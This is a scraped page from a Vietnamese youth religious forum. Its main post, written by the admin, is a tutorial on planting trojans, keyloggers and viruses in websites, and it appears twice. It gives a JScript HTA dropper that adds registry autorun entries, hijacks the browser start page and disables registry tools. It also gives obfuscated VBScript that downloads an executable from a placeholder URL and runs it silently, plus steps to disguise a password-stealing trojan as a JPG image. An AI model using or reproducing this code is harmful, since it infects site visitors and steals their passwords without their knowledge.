DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU
Chào mừng các bạn đến với diễn đàn tuoitretrungtin.forum-viet.com!
-----------------------------------------------------------------------------------------
Đây là diễn đàn của tuổi trẻ thánh thất TRUNG TÍN. địa chỉ: đường 47, thôn Trung Nghĩa, xã Nghĩa Thành, huyện Châu Đức, tỉnh BR-VT

Click "Đăng Kí" để đăng kí thành viên. Nếu bạn không thể đăng kí được hoặc không thể đăng nhập được vui lòng liên hệ [ Administrator ]
Thanh sinh Nguyễn Đình Thảo thanh đoàn Chơn Khai, thánh thất Trung Tín.
phone: 0978652249, 01217930720
E-mail: dinhthaonguyen1992@gmail.com
Y!M: billgate_nguyendinh


Đây là sân chơi chung của con nhà đạo nên hân hoan chào đón tất cả các bạn tham gia !
Thân chào! admin Suri Ken!
https://www.facebook.com/groups/331197093586284/
-----------------------------------------------------------------------------------------
Nếu không muốn hiển thị bảng này nữa click "Do not display again"
DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU
Chào mừng các bạn đến với diễn đàn tuoitretrungtin.forum-viet.com!
-----------------------------------------------------------------------------------------
Đây là diễn đàn của tuổi trẻ thánh thất TRUNG TÍN. địa chỉ: đường 47, thôn Trung Nghĩa, xã Nghĩa Thành, huyện Châu Đức, tỉnh BR-VT

Click "Đăng Kí" để đăng kí thành viên. Nếu bạn không thể đăng kí được hoặc không thể đăng nhập được vui lòng liên hệ [ Administrator ]
Thanh sinh Nguyễn Đình Thảo thanh đoàn Chơn Khai, thánh thất Trung Tín.
phone: 0978652249, 01217930720
E-mail: dinhthaonguyen1992@gmail.com
Y!M: billgate_nguyendinh


Đây là sân chơi chung của con nhà đạo nên hân hoan chào đón tất cả các bạn tham gia !
Thân chào! admin Suri Ken!
https://www.facebook.com/groups/331197093586284/
-----------------------------------------------------------------------------------------
Nếu không muốn hiển thị bảng này nữa click "Do not display again"
DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU

DIỄN ĐÀN TUỔI TRẺ GĐĐC TRUNG TÍNWelcome to http://www.tuoitretrungtin.forum-viet.com GĐĐC TRUNG TÍN tỉnh BRVT CHUNG SỨC PHỤNG SỰ ĐẮP XÂY GIA ĐÌNH ĐẠO CHÚNG VỮNG MẠNH
 
Trang ChínhGalleryTìm kiếmLatest imagesĐăng kýĐăng Nhập
www.tuoitretrungtin.forum-viet.com CHÀO MỪNG TẤT CẢ CÁC BẠN ĐẾN VỚI DIỄN ĐÀN TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU! địa chỉ: thánh thất TRUNG TÍN đường 47, thôn Trung Nghĩa, xã Nghĩa Thành, huyện Châu Đức, tỉnh Bà Rịa - Vũng Tàu website: http://www.thanhthattrungtin.com
trong quá trình sử dụng có mọi thắc mắc và đóng góp ý kiến các bạn vui lòng liên hệ Administrators số điện thoại nóng :0978652249
dây là diễn đàn tôn giáo nên mấy mem spam mình sẽ ban nick nha
Đăng Nhập
Tên truy cập:
Mật khẩu:
Đăng nhập tự động mỗi khi truy cập: 
:: Quên mật khẩu
Similar topics
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search
Poll
Thống Kê
Hiện có 2 người đang truy cập Diễn Đàn, gồm: 0 Thành viên, 0 Thành viên ẩn danh và 2 Khách viếng thăm

Không

Số người truy cập cùng lúc nhiều nhất là 16 người, vào ngày Wed Apr 17, 2024 10:47 am
Admin Suri Ken
trantuananh1991
tonghopvltk1
nguyendinhnhan
Võ Minh Nguyệt
XemDjjjj
DQD
chungnguyen
wtzmogtnmf
flower86
chungnguyen nhắn với»Tất cả thành viên
gửi vào lúc Wed Oct 19, 2011 9:41 pm ...
:THONG BAO CHO CAC BAN TÂN SINH VIÊN: 6/11/2011 TẬP THỂ TU TẬP DINH TPHCM TỔ CHỨC LỄ CẦU NGUYỆN NHẬP HỌC, THÂN MỜI CÁC BẠN TÂN SINH VIÊN VỀ THAM DỰ LÚC 8H TẠI TT.TRUNG MINH ĐƯỜNG BÌNH THỚI QUẬN 11.
trantuananh1991 nhắn vớiMAT THU HI
gửi vào lúc Fri Oct 14, 2011 3:31 pm ...
:MỘT SỐ MẬT MÃ THÔNG DỤNG
1/ HỆ THỐNG THAY THẾ
MẬT MÃ DÙNG CHỮ THAY CHỮ DẠNG CHUẨN:
( còn gọi là mật mã Caesar )
Giải mật thư: SGZHR AHMGE Chìa khóa: H = i
Giải:
+ Lập bảng tra:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
B c d e f g h i j k l m n o p q r s t u v w x y z a
+ Dùng bảng tra vừa thành lập đối chiếu từng ký …
trantuananh1991 nhắn với»Tất cả thành viên
gửi vào lúc Fri Oct 14, 2011 3:25 pm ...
:CHIEU THU 7 VA CHU NHAT GAN NGAY RAM THANG 10 CO ANH EM NAO RANH MOI VAO LIEN HOA CUU CUNG CONG LAM QUA
chungnguyen nhắn với»Tất cả thành viên
gửi vào lúc Tue Aug 09, 2011 4:21 pm ...
:NGÀY 13/8/2011 TỔ CHỨC SINH NHẬT TRÒN 18 TUỔI CHO THANH ĐOÀN CHƠN KHAI, BẮT ĐẦU LÚC 19H, KÍNH MỜI QUÝ ANH CHỊ EM VỀ THAM DỰ. THÂN CHÀO!
HỖ TRỢ XÂY DỰNG WEBSITE
Thu vien Java

eCHIP

Thư viện Java

Dịch vụ thiết kế web miễn phí

Thiết kế
Chủ đề web
Email của bạn
*Nội dung*
Đường dẫn Tựa đề
Thêm vào



Đây là đoạn mã nguồn trang web của bạn. Hãy tìm một Domain+Host để đưa nó lên mạng
Suri Ken hân hạnh đồng hành cùng các bạn. cùng nhau học tập các bạn nhé!
Thanh Sinh: NGuyễn Đình Thảo




Share
 

 Gắn trojan, keylog, virus vào website, forum

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Tác giảThông điệp
Admin Suri Ken
Admin
Admin Suri Ken

Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31

Gắn trojan, keylog, virus vào website, forum Empty
Bài gửiTiêu đề: Gắn trojan, keylog, virus vào website, forum   Gắn trojan, keylog, virus vào website, forum I_icon_minitimeWed Jun 15, 2011 9:03 am

Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan

open(”địa chỉ con trojan”);

Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở
website trojan sẽ mở ra và yêu cầu người lướt website mở ra

b, bạn copy vào notepad đoạn mã sau:
Code:



try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\
\\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies
\\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}






rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:






]]>






rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1
mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà
không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame

đoạn 2
Code:

on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0

Cách 3 :
Đầu tiên , mọi người hãy Download Program [You must be registered and logged in to see this link.] (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình (
chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim
truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===>
các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file
hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy
exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:

vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)
bằng
Code:
Set Shell1 =
CreateObject(”WScript.Shell”) Shell1.Run(pth)




Sau đó save lại thành file trojan.hta Sau đó
mở file web của bạn cho Victim truy cập ra thêm code này vào để run
file trojan.hta
Code:
datasrc=”#oRun” datafld=”view” dataformatas=”html”>
]]>


để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:

on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0

Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert
Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload
File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
Về Đầu Trang Go down
http://thanhsinhtrungtin.forum-viet.com
Admin Suri Ken
Admin
Admin Suri Ken

Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31

Gắn trojan, keylog, virus vào website, forum Empty
Bài gửiTiêu đề: Re: Gắn trojan, keylog, virus vào website, forum   Gắn trojan, keylog, virus vào website, forum I_icon_minitimeWed Jun 15, 2011 9:13 am

[You must be registered and logged in to see this link.]
Về Đầu Trang Go down
http://thanhsinhtrungtin.forum-viet.com
 

Gắn trojan, keylog, virus vào website, forum

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang

 Similar topics

-
» Hướng dẫn cài đặt VBB 4 từ A->W CHO ANH EM LÀM FORUM NHÉ........
» Tổng hợp các code hiệu ứng cho forum

Permissions in this forum:Bạn không có quyền trả lời bài viết
DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU :: NHỊP CẦU GIAO LƯU GIỮA BẬC TIỀN BỐI VÀ CÁC THẾ HỆ ĐÀN EM! :: KHOA HỌC KĨ THUẬT THÔNG TIN CÔNG NGHỆ :: THỦ THUẬT WEB-
Gắn trojan, keylog, virus vào website, forumXem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Wed Jun 15, 2011 9:03 am
Gắn trojan, keylog, virus vào website, forum Bgavat18
Gắn trojan, keylog, virus vào website, forum Bgavat10Gắn trojan, keylog, virus vào website, forum Bgavat12Gắn trojan, keylog, virus vào website, forum Bgavat13
Gắn trojan, keylog, virus vào website, forum Bgavat15Admin Suri KenGắn trojan, keylog, virus vào website, forum Bgavat17
Gắn trojan, keylog, virus vào website, forum Bgavat19Gắn trojan, keylog, virus vào website, forum Bgavat21Gắn trojan, keylog, virus vào website, forum Bgavat22
MaiKhongQuen - Admin Suri Ken – [Admin]
Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31
Profile Admin Suri Ken
Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31

Gắn trojan, keylog, virus vào website, forum Vide10

Bài gửiTiêu đề: Gắn trojan, keylog, virus vào website, forum
http://thanhsinhtrungtin.forum-viet.com

Tiêu đề: Gắn trojan, keylog, virus vào website, forum

Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan

open(”địa chỉ con trojan”);

Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở
website trojan sẽ mở ra và yêu cầu người lướt website mở ra

b, bạn copy vào notepad đoạn mã sau:
Code:



try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\
\\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\
Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies
\\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}






rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:






]]>






rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1
mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà
không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame

đoạn 2
Code:

on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0

Cách 3 :
Đầu tiên , mọi người hãy Download Program [You must be registered and logged in to see this link.] (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình (
chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim
truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===>
các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file
hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy
exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
